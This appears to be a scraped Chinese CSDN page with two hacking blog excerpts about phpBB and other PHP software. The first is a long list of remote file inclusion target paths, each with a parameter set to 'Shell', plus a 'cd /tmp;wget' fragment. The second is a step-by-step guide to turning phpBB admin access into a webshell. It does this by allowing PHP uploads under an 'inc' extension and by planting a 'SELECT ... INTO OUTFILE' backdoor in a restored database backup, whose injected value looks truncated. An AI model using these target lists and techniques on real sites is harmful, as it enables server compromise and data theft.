phpbb shell_phpbb seo - CSDN
精华内容
参与话题
  • 包含漏洞收集

    千次阅读 2007-09-08 23:25:00
    PHP Attacker,PHP Remote File Injecter v1.0 下面是程序代码index2.php?includes_dir=Shell forums/toplist.php?phpbb_root_path=Shell forum/toplist.php?phpbb_root_path=Shell admin/config_settings.tpl....

    PHP Attacker,PHP Remote File Injecter v1.0  下面是程序代码
    index2.php?includes_dir=Shell  
    forums/toplist.php?phpbb_root_path=Shell  
    forum/toplist.php?phpbb_root_path=Shell  
    admin/config_settings.tpl.php?include_path=Shell  
    include/common.php?include_path=Shell  
    event/index.php?page=Shell  
    forum/index.php?includeFooter=Shell  
    forums/index.php?includeFooter=Shell  
    forum/bb_admin.php?includeFooter=Shell  
    forums/bb_admin.php?includeFooter=Shell  
    language/lang_english/lang_activity.php?phpbb_root_path=Shell  
    forum/language/lang_english/lang_activity.php?phpbb_root_path=Shell  
    blend_data/blend_common.php?phpbb_root_path=Shell  
    master.php?root_path=Shell  
    includes/kb_constants.php?module_root_path=Shell  
    forum/includes/kb_constants.php?module_root_path=Shell  
    forums/includes/kb_constants.php?module_root_path=Shell  
    classes/adodbt/sql.php?classes_dir=Shell  
    agenda.php3?rootagenda=Shell  
    agenda2.php3?rootagenda=Shell  
    sources/lostpw.php?CONFIG[path]=Shell  
    topsites/sources/lostpw.php?CONFIG[path]=Shell  
    toplist/sources/lostpw.php?CONFIG[path]=Shell  
    sources/join.php?CONFIG[path]=Shell  
    topsites/sources/join.php?CONFIG[path]=Shell  
    toplist/sources/join.php?CONFIG[path]=Shell  
    topsite/sources/join.php?CONFIG[path]=Shell  
    public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=Shell  
    extras/poll/poll.php?file_newsportal=Shell  
    index.php?site_path=Shell  
    mail/index.php?site_path=Shell  
    fclick/show.php?path=Shell  
    show.php?path=Shell  
    calogic/reconfig.php?GLOBALS[CLPath]=Shell  
    eshow.php?Config_rootdir=Shell  
    auction/auction_common.php?phpbb_root_path=Shell  
    index.php?inc_dir=Shell
    calendar/index.php?inc_dir=Shell  
    modules/TotalCalendar/index.php?inc_dir=Shell  
    modules/calendar/index.php?inc_dir=Shell  
    calendar/embed/day.php?path=Shell  
    ACalendar/embed/day.php?path=Shell  
    calendar/add_event.php?inc_dir=Shell  
    claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=Shell  
    claroline/auth/ldap/authldap.php?includePath=Shell  
    docebo/modules/credits/help.php?lang=Shell  
    modules/credits/help.php?lang=Shell  
    config.php?returnpath=Shell  
    editsite.php?returnpath=Shell  
    in.php?returnpath=Shell  
    addsite.php?returnpath=Shell  
    includes/pafiledb_constants.php?module_root_path=Shell  
    phpBB/includes/pafiledb_constants.php?module_root_path=Shell  
    pafiledb/includes/pafiledb_constants.php?module_root_path=Shell  
    auth/auth.php?phpbb_root_path=Shell  
    auth/auth_phpbb/phpbb_root_path=Shell  
    apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=Shell  
    apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=Shell  
    infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=Shell  
    phpdig/includes/config.php?relative_script_path=Shell  
    includes/phpdig/includes/config.php?relative_script_path=Shell  
    includes/dbal.php?eqdkp_root_path=Shell  
    eqdkp/includes/dbal.php?eqdkp_root_path=Shell  
    dkp/includes/dbal.php?eqdkp_root_path=Shell  
    path/include/SQuery/gameSpy2.php?libpath=Shell  
    include/global.php?GLOBALS[includeBit]=Shell  
    topsites/config.php?returnpath=Shell  
    manager/frontinc/prepend.php?_PX_config[manager_path]=Shell  
    ubbthreads/addpost_newpoll.php?addpoll=Shell thispath=Shell  
    forum/addpost_newpoll.php?thispath=Shell  
    forums/addpost_newpoll.php?thispath=Shell  
    ubbthreads/ubbt.inc.php?thispath=Shell  
    forums/ubbt.inc.php?thispath=Shell  
    forum/ubbt.inc.php?thispath=Shell  
    forum/admin/addentry.php?phpbb_root_path=Shell  
    admin/addentry.php?phpbb_root_path=Shell  
    index.php?f=Shell  
    index.php?act=Shell  
    ipchat.php?root_path=Shell  
    includes/orderSuccess.inc.php?glob[rootDir]=Shell  
    stats.php?dir[func]=Shell dir[base]=Shell  
    ladder/stats.php?dir[base]=Shell  
    ladders/stats.php?dir[base]=Shell  
    sphider/admin/configset.php?settings_dir=Shell  
    admin/configset.php?settings_dir=Shell  
    vwar/admin/admin.php?vwar_root=Shell  
    modules/vwar/admin/admin.php?vwar_root=Shell  
    modules/vWar_Account/includes/get_header.php?vwar_root=Shell  
    modules/vWar_Account/includes/functions_common.php?vwar_root2=Shell  
    sphider/admin/configset.php?settings_dir=Shell  
    admin/configset.php?settings_dir=Shell  
    impex/ImpExData.php?systempath=Shell  
    forum/impex/ImpExData.php?systempath=Shell  
    forums/impex/ImpExData.php?systempath=Shell  
    application.php?base_path=Shell  
    index.php?theme_path=Shell  
    become_editor.php?theme_path=Shell  
    add.php?theme_path=Shell  
    bad_link.php?theme_path=Shell  
    browse.php?theme_path=Shell  
    detail.php?theme_path=Shell  
    fav.php?theme_path=Shell  
    get_rated.php?theme_path=Shell  
    login.php?theme_path=Shell  
    mailing_list.php?theme_path=Shell  
    new.php?theme_path=Shell  
    modify.php?theme_path=Shell  
    pick.php?theme_path=Shell  
    power_search.php?theme_path=Shell  
    rating.php?theme_path=Shell  
    register.php?theme_path=Shell  
    review.php?theme_path=Shell  
    rss.php?theme_path=Shell  
    search.php?theme_path=Shell  
    send_pwd.php?theme_path=Shell  
    sendmail.php?theme_path=Shell  
    tell_friend.php?theme_path=Shell  
    top_rated.php?theme_path=Shell  
    user_detail.php?theme_path=Shell  
    user_search.php?theme_path=Shell  
    invoice.php?base_path=Shell  
    cgi-bin//classes/adodbt/sql.php?classes_dir=Shell  
    cgi-bin/install/index.php?G_PATH=Shell  
    cgi-bin/include/print_category.php?dir=Shell  
    includes/class_template.php?quezza_root_path=Shell  
    bazar/classified_right.php?language_dir=Shell  
    classified_right.php?language_dir=Shell  
    phpBazar/classified_right.php?language_dir=Shell  
    chat/messagesL.php3?cmd=Shell  
    phpMyChat/chat/messagesL.php3?cmd=Shell  
    bbs/include/write.php?dir=Shell  
    visitorupload.php?cmd=Shell  
    modules/center/admin/accounts/process.php?module_path=Shell  
    index.php?template=Shell  
    armygame.php?libpath=Shell  
    lire.php?rub=Shell  
    pathofhostadmin/?page=Shell  
    apa_phpinclude.inc.php?apa_module_basedir=Shell  
    index.php?req_path=Shell  
    research/boards/encapsbb-0.3.2_fixed/index_header.php?root=Shell  
    Farsi1/index.php?archive=Shell  
    index.php?archive=Shell  
    show_archives.php?template=Shell  
    forum/include/common.php?pun_root=Shell  
    pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=Shell  
    vuln.php?=Shell  
    cgi-bin//include/write.php?dir=Shell  
    admin/common.inc.php?basepath=Shell  
    pm/lib.inc.php?sfx=Shell  
    pm/lib.inc.php?pm_path=Shell  
    artmedic-kleinanzeigen-path/index.php?id=Shell  
    index.php?pagina=Shell  
    osticket/include/main.php?include_dir=Shell  
    include/main.php?config[search_disp]=Shell include_dir=Shell  
    phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=Shell  
    quick_reply.php?phpbb_root_path=Shell  
    zboard/include/write.php?dir=Shell  
    PATH/admin/plog-admin-functions.php?configbasedir=Shell  
    path_to_phpgreetz/content.php?content=Shell  
    path_to_qnews/q-news.php?id=Shell  
    _conf/core/common-tpl-vars.php?confdir=Shell  
    votebox.php?VoteBoxPath=Shell  
    al_initialize.php?alpath=Shell  
    include/db.php?GLOBALS[rootdp]=Shell  
    modules/news/archivednews.php?GLOBALS[language_home]=Shell  
    protection.php?siteurl=Shell  
    modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Shell
    index2.php?includes_dir=Shell  
    classes.php?LOCAL_PATH=Shell  
    extensions/moblog/moblog_lib.php?basedir=Shell  
    modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=Shell  
    phpWebLog/include/init.inc.php?G_PATH=Shell  
    admin/objects.inc.php4?Server=Shell  
    trg_news30/trgnews/install/article.php?dir=Shell  
    block.php?Include=Shell  
    arpuivo.php?data=Shell  
    path_to_gallery/setup/index.php?GALLERY_BASEDIR=Shell  
    include/help.php?base=Shell  
    index.php?[Home]=Shell  
    path_to_script/block.php?Include=Shell  
    examples/phonebook.php?page=Shell  
    PHPNews/auth.php?path=Shell  
    include/print_category.php?dir=Shell  
    skin/zero_vote/login.php?dir=Shell  
    skin/zero_vote/setup.php?dir=Shell  
    skin/zero_vote/ask_password.php?dir=Shell
    gui/include/sql.php?include_path=Shell  
    webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini=Shell  
    email.php?login=Shell cer_skin=Shell  
    PhotoGal/ops/gals.php?news_file=Shell  
    index.php?custom=Shell  
    loginout.php?cutepath=Shell  
    oneadmin/config.php?path[docroot]=Shell  
    xcomic/initialize.php?xcomicRootPath=Shell
    skin/zero_vote/setup.php?dir=Shell  
    skin/zero_vote/error.php? dir=Shell  
    admin_modules/admin_module_captions.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_edit.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_delimage.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_deldir.inc.php?config[path_src_include]=Shell  
    src/index_overview.inc.php?config[path_src_include]=Shell  
    src/index_leftnavbar.inc.php?config[path_src_include]=Shell  
    src/index_image.inc.php?config[path_src_include]=Shell  
    src/image-gd.class.php?config[path_src_include]=Shell  
    src/image.class.php?config[path_src_include]=Shell  
    src/album.class.php?config[path_src_include]=Shell  
    src/show_random.inc.php?config[path_src_include]=Shell  
    src/main.inc.php?config[path_src_include]=Shell  
    src/index_passwd-admin.inc.php?config[path_admin_include]=Shell  
    yappa-ng/src/index_overview.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_captions.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_edit.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_delimage.inc.php?config[path_src_include]=Shell  
    admin_modules/admin_module_deldir.inc.php?config[path_src_include]=Shell  
    src/index_overview.inc.php?config[path_src_include]=Shell  
    src/image-gd.class.php?config[path_src_include]=Shell  
    src/image.class.php?config[image_module]=Shell  
    src/album.class.php?config[path_src_include]=Shell  
    src/show_random.inc.php?config[path_src_include]=Shell  
    src/main.inc.php?config[path_src_include]=Shell  
    includes/db_adodb.php?baseDir=Shell  
    includes/db_connect.php?baseDir=Shell  
    includes/session.php?baseDir=Shell
    混世魔王BLOG
    26836659.BLOGCN.COM
    转载著名出处
    modules/projects/gantt.php?dPconfig[root_dir]=Shell  
    modules/projects/gantt2.php?dPconfig[root_dir]=Shell  
    modules/projects/vw_files.php?dPconfig[root_dir]=Shell  
    modules/admin/vw_usr_roles.php?baseDir=Shell  
    modules/public/calendar.php?baseDir=Shell
    modules/public/date_format.php?baseDir=Shell
    modules/tasks/gantt.php?baseDir=Shell  
    mantis/login_page.php?g_****_include_file=Shell  
    phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=Shell  
    modules/My_eGallery/public/displayCategory.php?basepath=Shell
    dotproject/modules/files/index_table.php?root_dir=Shell
    nukebrowser.php?filnavn=Shell  
    bug_sponsorship_list_view_inc.php?t_core_path=Shel l
    modules/coppermine/themes/coppercop/theme.php?THEME_DIR=Shell
    modules/coppermine/themes/maze/theme.php?THEME_DIR=Shell
    modules/coppermine/include/init.inc.php?CPG_M_DIR=Shell  
    includes/calendar.php?phpc_root_path=Shell  
    includes/setup.php?phpc_root_path=Shell  
    phpBB/admin/admin_styles.php?mode=Shell  
    aMember/plugins/db/mysql/mysql.inc.php?config=Shell  
    admin/lang.php?CMS_ADMIN_PAGE=Shell  
    inc/pipe.php?HCL_path=Shell  
    include/write.php?dir=Shell  
    becommunity/community/index.php?pageurl=Shell  
    modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=Shell  
    modules/mod_mainmenu.php?mosConfig_absolute_path=Shell  
    modules/agendax/addevent.inc.php?agendax_path=Shell  
    shoutbox/expanded.php?conf=Shell  
    modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=Shell  
    index.php?page=Shell  
    index.php?pag=Shell  
    index.php?include=Shell  
    index.php?content=Shell  
    index.php?cont=Shell  
    index.php?c=Shell  
    modules/My_eGallery/index.php?basepath=Shell  
    modules/newbb_plus/class/forumpollrenderer.php?bbPath=Shell  
    journal.php?m=Shell  
    index.php?m=Shell  
    links.php?c=Shell  
    forums.php?m=Shell  
    list.php?c=Shell  
    user.php?xoops_redirect=Shell  
    index.php?id=Shell  
    r.php?url=Shell  
    CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=Shell
    inc/formmail.inc.php?script_root=Shell  
    include/init.inc.php?G_PATH=Shell  
    backend/addons/links/index.php?PATH=Shell  
    modules/newbb_plus/class/class.forumposts.php?bbPath[path]=Shell  
    modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=Shell  
    protection.php?siteurl=Shell  
    htmltonuke.php?filnavn=Shell  
    mail_autocheck.php?pm_path=Shell  
    index.php?p=Shell  
    modules/4nAlbum/public/displayCategory.php?basepath=Shell  
    e107/e107_handlers/secure_img_render.php?p=Shell  
    include/new-visitor.inc.php?lvc_include_dir=Shell  
    path_of_cpcommerce/_functions.php?prefix=Shell  
    community/modules/agendax/addevent.inc.php?agendax_path=Shell  
    library/editor/editor.php?root=Shell  
    library/lib.php?root=Shell  
    zentrack/index.php?configFile=Shell  
    pivot/modules/module_db.php?pivot_path=Shell  
    main.php?x=Shell  
    myPHPCalendar/admin.php?cal_dir=Shell  
    index.php/main.php?x=Shell  
    index.php?x=Shell  
    index.php?open=Shell  
    index.php?visualizar=Shell  
    template.php?pagina=Shell  
    index.php?inc=Shell  
    includes/include_onde.php?include_file=Shell  
    index.php?pg=Shell  
    index.php?show=Shell  
    index.php?cat=Shell  
    print.php?val1=Shell  
    cmd.php?function=Shell  
    iframe.php?file=Shell  
    os/pointer.php?url=Shell  
    p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=Shell  
    index.php?file=Shell  
    db.php?path_local=Shell  
    phpGedView/individual.php?PGV_BASE_DIRECTORY=Shell  
    index.php?kietu[url_hit]=Shell  
    phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=Shell  
    Sources/Packages.php?sourcedir=Shell  
    yabbse/Sources/Packages.php?sourcedir=Shell  
    modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=Shell  
    cgi-bin//gadgets/Blog/BlogModel.php?path=Shell  
    cgi-bin//admin.php?cal_dir=Shell  
    gallery/captionator.php?GALLERY_BASEDIR=Shell  
    cgi-bin/main.php?x=Shell  
    Blog/BlogModel.php?path=Shell  
    admin.php?cal_dir=Shell  
    expanded.php?conf=Shell  
    mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=Shell  
    pollvote/pollvote.php?pollname=Shell  
    displayCategory.php?basepath=Shell  
    phpBB2/admin/admin_cash.php?phpbb_root_path=Shell  
    modules/foro/includes/functions_admin.php?phpbb_root_path=Shell  
    modules/Forums/admin/admin_forums.php?phpEx=Shell  
    modules/Forums/admin/admin_disallow.php?phpEx=Shell  
    modules/Forums/admin/admin_smilies.php?phpEx=Shell  
    modules/Forums/admin/admin_board.php?phpEx=Shell  
    modules/Forums/admin/admin_users.php?phpEx=Shell  
    modules/Forums/admin/admin_mass_email.php?phpEx=Shell  
    modules/Forums/admin/admin_forum_prune.php?phpEx=Shell  
    modules/Forums/admin/admin_styles.php?phpbb_root_path=Shell  
    index.php?hc=Shell  
    mt-comments.cgi?id=Shell  
    webcalendar/tools/send_reminders.php?includedir=Shell  
    cmd/product_info.php/products_id/1622/shop_content.php?coID=Shell  
    addevent.inc.php?agendax_path=Shell  
    step_one.php?server_inc=Shell  
    upgrade_album.php?GALLERY_BASEDIR=Shell  
    search.php?cutepath=Shell  
    modules.php?name=Shell  
    wagora/extras//quicklist.php?site=Shell  
    vCard/admin/define.inc.php?match=Shell  
    forum/ubbthreads.php?Cat=Shell  
    admin/includes/classes/spaw/spaw_control.class.php?spaw_root=Shell  
    secure.php?cfgProgDir=Shell  
    modules/My_eGallery/public//inc/?HCL_path=Shell  
    modules/My_eGallery/public/imagen.php?basepath=Shell  
    adlayer.php?layerstyle=Shell  
    Forums/bb_smilies.php?name=Shell  
    modules/Forums/bb_smilies.php?name=Shell  
    gadgets/Blog/BlogModel.php?path=Shell  
    learnlinc/clmcpreload.php?CLPATH=Shell  
    modernbill/samples/news.php?DIR=Shell  
    religions/faq.php?page=Shell  
    forum/viewtopic.php?t=Shell  
    announcements.php?includePath=Shell  
    inc/header.php/step_one.php?server_inc=Shell  
    phpatm/index.php?include_location=Shell  
    gb/form.inc.php3?lang=Shell  
    shannen/index.php?x=Shell  
    family/phpgedview/index.php?PGV_BASE_DIRECTORY=Shell  
    main.php?left=Shell  
    forum/misc.php?action=Shell  
    nucleus/libs/globalfunctions.php?DIR_LIBS=Shell  
    show_archives.php?cutepath=Shell  
    gallery.php=Shell  
    magicforum/misc.php?action=Shell  
    forum/admin/actions/del.php?include_path=Shell  
    index.php?meio=Shell  
    local/investing_industrialeastate1.php?a=Shell  
    modules/coppermine/themes/default/theme.php?THEME_DIR
    Popper/index.php?childwindow.inc.php?form=Shell  
    class.mysql.php?path_to_bt_dir=Shell  
    include/footer.inc.php?_AMLconfig[cfg_serverpath]=Shell  
    eyeos/desktop.php?baccio=Shell  
    ashnews.php?pathtoashnews=Shell  
    index.php?modpath=Shell  
    becommunity/community/index.php?pageurl=Shell  
    index.php?sqld=Shell  
    modules/module_db.php?pivot_path=Shell  
    catalog/includes/include_once.php?include_file=Shell  
    cgi-bin/calendar.pl?fromTemplate=Shell  
    live/inc/pipe.php?HCL_path=Shell  
    zb41/include/write.php?dir=Shell  
    cgi-bin/awstats.pl?logfile=Shell  
    presse/stampa.php3?azione=Shell  
    inc/step_one_tables.php?server_inc=Shell  
    index.php?mainpage=Shell  
    phpprojekt/lib/authform.inc.php?path_pre=Shell  
    captionator.php?GALLERY_BASEDIR=Shell  
    _head.php?_zb_path=Shell .example.com
    achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=Shell  
    gallery/captionator.php?GALLERY_BASEDIR=Shell .example.com
    globals.php3?LangCookie=Shell .example.com
    include/msql.php?inc_dir=Shell  
    include/mssql7.php?inc_dir=Shell  
    include/mysql.php?inc_dir=Shell  
    include/oci8.php?inc_dir=Shell  
    include/postgres.php?inc_dir=Shell  
    include/postgres65.php?inc_dir=Shell  
    install.php?phpbb_root_dir=Shell  
    mantis/login_page.php?g_****_inc_dir=Shell  
    page.php?template=Shell  
    phorum/admin/actions/del.php?include_path=Shell  
    pollensondage.inc.php?app_path=Shell  
    user/agora_user.php?inc_dir=Shell  
    user/ldap_example.php?inc_dir=Shell  
    userlist.php?ME=Shell .example.com
    _functions.php?prefix=Shell  
    cpcommerce/_functions.php?prefix=Shell  
    ashnews.php?pathtoashnews=Shell cd /tmp;wget
    eblog/blog.inc.php?xoopsConfig[xoops_url]=Shell  
    b2-tools/gm-2-b2.php?b2inc=Shell  
    includes/include_once.php?include_file=Shell  
    modules.php?name=Shell jokeid=Shell  
    index.php?site=Shell  
    livehelp/inc/pipe.php?HCL_path=Shell  
    hcl/inc/pipe.php?HCL_path=Shell  
    support/faq/inc/pipe.php?HCL_path=Shell  
    help/faq/inc/pipe.php?HCL_path=Shell  
    helpcenter/inc/pipe.php?HCL_path=Shell  
    live-support/inc/pipe.php?HCL_path=Shell  
    gnu3/index.php?doc=Shell  
    gnu/index.php?doc=Shell  
    phpgwapi/setup/tables_update.inc.php?appdir=Shell  
    includes/calendar.php?phpc_root_path=Shell  
    includes/setup.php?phpc_root_path=Shell  
    inc/authform.inc.php?path_pre=Shell  
    include/authform.inc.php?path_pre=Shell  
    web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=Shell  
    web_statistics//tools/send_reminders.php?includedir=Shell  
    web_statistics//include/write.php?dir=Shell  
    web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=Shell  
    web_statistics//calendar/tools/send_reminders.php?includedir=Shell  
    web_statistics//skin/zero_vote/error.php?dir=Shell  
    web_statistics//coppercop/theme.php?THEME_DIR=Shell  
    includes/header.php?systempath=Shell  
    Gallery/displayCategory.php?basepath=Shell  
    index.inc.php?PATH_Includes=Shell  
    nphp/nphpd.php?nphp_config[LangFile]=Shell  
    ashheadlines.php?pathtoashnews=Shell  
    demo/includes/init.php?user_inc=Shell  
    jaf/index.php?show=Shell  
    inc/shows.inc.php?cutepath=Shell  
    poll/admin/common.inc.php?base_path=Shell  
    sources/post.php?fil_config=Shell  
    bb_lib/checkdb.inc.php?libpach=Shell  
    include/livre_include.php?chem_absolu=Shell  
    index.php?pageurl=Shell  
    derniers_commentaires.php?rep=Shell  
    modules/coppermine/themes/default/theme.php?THEME_DIR=Shell  
    coppermine/themes/maze/theme.php?THEME_DIR=Shell  
    allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=Shell  
    allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=Shell  
    agendax/addevent.inc.php?agendax_path=Shell  
    main.php?page=Shell  
    default.php?page=Shell  
    index.php?action=Shell  
    index1.php?p=Shell  
    index2.php?x=Shell  
    index2.php?content=Shell  
    index.php?conteudo=Shell  
    GradeMap/index.php?page=Shell  
    phpopenchat/contrib/yabbse/poc.php?sourcedir=Shell  
    calendar/calendar.php?serverPath=Shell  
    calendar/functions/popup.php?serverPath=Shell  
    calendar/events/header.inc.php?serverPath=Shell  
    calendar/events/datePicker.php?serverPath=Shell  
    calendar/setup/setupSQL.php?serverPath=Shell  
    calendar/setup/header.inc.php?serverPath=Shell  
    install/index.php?G_PATH=Shell  
    support/mailling/maillist/inc/initdb.php?absolute_path=Shell  
    coppercop/theme.php?THEME_DIR=Shell  
    dotproject/modules/projects/addedit.php?root_dir=Shell  
    dotproject/modules/projects/view.php?root_dir=Shell  
    dotproject/modules/projects/vw_files.php?root_dir=Shell  
    dotproject/modules/tasks/addedit.php?root_dir=Shell  
    dotproject/modules/tasks/viewgantt.php?root_dir=Shell  
    My_eGallery/public/displayCategory.php?basepath=Shell  
    index.php?meio.php=Shell  
    index.php?configFile=Shell  
    index.php?do=Shell  
    phpshop/index.php?base_dir=Shell  
    contacts.php?cal_dir=Shell  
    convert-date.php?cal_dir=Shell  
    album_portal.php?phpbb_root_path=Shell  
    mainfile.php?MAIN_PATH=Shell  
    html/affich.php?base=Shell  
    gallery/init.php?HTTP_POST_VARS=Shell  
    ideabox/include.php?gorumDir=Shell  
    stats/modules/My_eGallery/index.php?basepath=Shell  
    stats/include/write.php?dir=Shell  
    stats/tools/send_reminders.php?includedir=Shell  
    index.cgiupgrade_album.php?GALLERY_BASEDIR=Shell  
    pollvote/pollvote.php?pollname
    includes/page_header.php?dir=Shell  
    index2.php?mosConfig_absolute_path=Shell  
    new/bbs//include/write.php?dir=Shell  
    index.php?mosConfig_absolute_path=Shell  
    modules/My_eGallery/public/inc/?HCL_path=Shell  
    /forum/auth/auth.php?phpbb_root_path=Shell  
    /forum/auth/auth_phpbb/phpbb_root_path=Shell  
    /cutenews/comments.php?cutepath=Shell  
    /library/lib.php?root=Shell  
    /impex/ImpExData.php?systempath=Shell  
    /coppermine/thumbnails.php?lang=Shell  
    /gallery/thumbnails.php?lang=Shell  
    /aWebNews/visview.php?path_to_news=Shell  
    /ashnews.php?pathtoashnews=Shell  
    /4images/index.php?template=Shell  
    /galeri/index.php?template=Shell  
    /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=Shell  
    /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=Shell  
    /components/com_smf/smf.php?mosConfig_absolute_path=Shell  
    /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=Shel l  
    /components/com_simpleboard/image_upload.php?sbp=Shell  
    /gallery/index.php?template=Shell  
    /auth/auth.php?phpbb_root_path=Shell  
    /auth/auth_phpbb/phpbb_root_path=Shell  
    /modules/Forums/admin/index.php?phpbb_root_path=Shell  
    /modules/Forums/admin/admin_avatar.php?phpbb_root_path=Shell  
    /modules/Forums/admin/admin_styles.php?phpbb_root_path=Shell  
    /_wk/wk_lang.php?wkPath=Shell  
    /shoutbox/expanded.php?conf=Shell  
    /myPHPCalendar/admin.php?cal_dir=Shell  
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=Shell  
    /modules/Forums/admin/admin_board.php?phpEx=Shell  
    /modules/Forums/admin/admin_users.php?phpEx=Shell  
    /library/editor/editor.php?root=Shell  
    /library/lib.php?root=Shell  
    /e107/e107_handlers/secure_img_render.php?p=Shell  
    /modules/My_eGallery/public/displayCategory.php?basepath=Shell  
    /modules/My_eGallery/index.php?basepath=Shell  
    /modules/coppermine/themes/default/theme.php?THEME_DIR=Shell  
    /modules/4nAlbum/public/displayCategory.php?basepath=Shell  
    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=Shell  
    /modules/coppermine/themes/maze/theme.php?THEME_DIR=Shell  
    /modules/coppermine/include/init.inc.php?CPG_M_DIR=Shell  
    /phpBB/admin/admin_styles.php?mode=Shell  
    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=Shell  
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=Shell  
    /index.php?page=Shell  
    /index.php?pag=Shell  
    /index.php?sayfa=Shell  
    /index.php?pg=Shell  
    /index.php?include=Shell  
    /index.php?content=Shell  
    /index.php?p=Shell  
    /index.php?s=Shell  
    /index.php?cont=Shell  
    /index.php?c=Shell  
    /journal.php?m=Shell  
    /index.php?m=Shell  
    /links.php?c=Shell  
    /forums.php?m=Shell  
    /list.php?c=Shell  
    /journal.php?m=Shell  
    /user.php?xoops_redirect=Shell  
    /index.php?id=Shell

     
    展开全文
  • phpbb后台拿webshell的方法

    千次阅读 2007-12-08 15:39:00
    导读: 前面所讲述的操作都非常简单,基本上没有...可是,最新版本的PHPBB后台已经不允许添加上传类型了,如图5。 图5 可以利用的基本上都限制了,经测试发现部分空间可以添加inc扩展名,然后前台发帖上传扩展为inc的
    
    	导读: 
      前面所讲述的操作都非常简单,基本上没有什么太大的难度。可是进入了后台要获取Webshell就有点麻烦了,PHPBB旧版本还可以直接添加上传类型为PHP的文件,然后直接上传PHP的后门得到Webshell。可是,最新版本的PHPBB后台已经不允许添加上传类型了,如图5。
      图5
      可以利用的基本上都限制了,经测试发现部分空间可以添加inc扩展名,然后前台发帖上传扩展为inc的PHP后门程序也可以成功解释执行。不过这个方法局限性太大,但有部分论坛确实是可以成功的!添加inc扩展名的操作也比较简单。在后台找到“扩展名”—“扩展名控制”,然后在“扩展名”里填入inc,勾选上“增加”,其它默认,然后点提交即可,如图6。
      图6
      然后在前台发帖或编辑帖子来上传附件,上传扩展名为inc的PHP后门,再在预览里找到Webshell的访问路径即可得到Webshell(在预览里直接点击附件名即可打开Webshell)。当然了,要是空间支持其它脚本,大可以添加上传jsp后门哦。如果要添加asp后门也是有办法的,虽然“禁止扩展名”里禁止了上传asp。但是我们可以先把禁止了的asp删除掉,然后再参照添加inc扩展名的方法添加即可。
      除了这个方法可以拿到Webshell外,还有一个稍为复杂点的方法。这个方法同样局限性也很大,因为要求论坛要使用具有root权限的MySQL用户名和密码才可以成功!
      具体操作步骤如下(以本机架设的测试论坛举例说明):
      1、先使用管理员用户名和密码登录后台;
      2、在浏览器中访问http://127.0.0.1/admin/admin_disallow.php?setmodules=00(会看到空白页面);
      3、在后台找到“总体管理”—“备份数据库”,执行备份数据库操作(备份完毕会自动弹出下载窗口,下载保存本地即可);
      4、复制备份文件另存一份(用于导出Webshell后恢复论坛),使用记事本打开下载回来的数据库文件phpbb_db_backup.sql,查找关键字●INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES●,一共有两处!●INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES●后面的内容会根据情况而有所不同。比如我这里是●INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '测试分区', '10');●;
      5、把●INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '测试分区', '10');●改为●INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', ', '10');SELECT cat_title INTO OUTFILE 'D://Program Files//VertrigoServ//www//shell.php' FROM phpbb_categories where cat_id=1;●,保存即可。简单的解释一下,“D://Program Files//VertrigoServ//www//shell.php”是导出Webshell的绝对路径(即为我本机的论坛安装目录),这个方法是利用数据库操作实现的,先往一个已存在的表段里插入PHP一句话后门,然后再使用“SELECT 表段名 INTO OUTFILE”导出到论坛目录,从而得到Webshell(要注意的是里面的绝对路径一定要把/替换成//,否则不可以成功,而*nix类系统使用/连结路径);
      6、在后台找到“总体管理”—“恢复数据库”,浏览选中刚才改好的备份文件phpbb_db_backup.sql,然后点击“开始恢复”,恢复完毕后一般会看到一些错误,不必理会,过会儿会恢复就是了;
      7、使用一句话客户端连接http://127.0.0.1/shell.php,得到简易的Webshell,如图7;
      8、参照第6步,使用未修改过的phpbb_db_backup.sql恢复论坛数据(要是不恢复,论坛会出错)!
      图7
